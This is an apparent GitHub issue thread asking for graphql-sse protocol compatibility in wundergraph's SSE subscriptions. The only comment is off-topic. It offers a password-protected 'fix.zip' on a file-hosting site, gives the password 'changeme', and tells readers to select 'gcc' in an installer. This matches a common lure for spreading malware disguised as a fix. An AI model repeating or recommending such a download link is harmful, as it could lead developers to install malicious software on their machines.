### ISSUE TITLE
graphql-sse support

### ISSUE THREAD

**Issue by hansehe** [wundergraph/wundergraph#1401]
## Problem

Wundergraphs subscriptions over SSE doesn't work with the graphql-sse protocol.
Please see this discussion:
- https://github.com/enisdenjo/graphql-sse/discussions/105#discussioncomment-10448808

## Suggested solution

Implement the `event: next` with the subscriptions from Wundergraph, so that it's compatible with the graphql-sse library.

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
